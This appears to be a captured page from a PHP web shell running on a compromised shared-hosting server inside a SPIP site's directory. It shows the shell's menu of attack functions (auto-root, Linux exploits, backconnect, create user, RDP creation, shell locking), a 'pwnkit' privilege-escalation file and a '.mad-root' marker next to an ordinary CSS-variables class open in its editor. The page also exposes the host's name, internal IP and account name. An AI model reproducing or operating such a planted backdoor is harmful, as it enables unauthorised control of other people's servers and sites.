Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
src /
Css /
Vars /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Collection.php
449
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Collection.php
<?php namespace Spip\Css\Vars; /** * Collection de variables CSS * @internal */ class Collection { private array $vars = []; public function add(string $var, string $value) { $this->vars[$var] = $value; } public function getString(): string { $string = ''; foreach ($this->vars as $key => $value) { $string .= "$key: $value;\n"; } return $string; } public function __toString(): string { return $this->getString(); } }
Close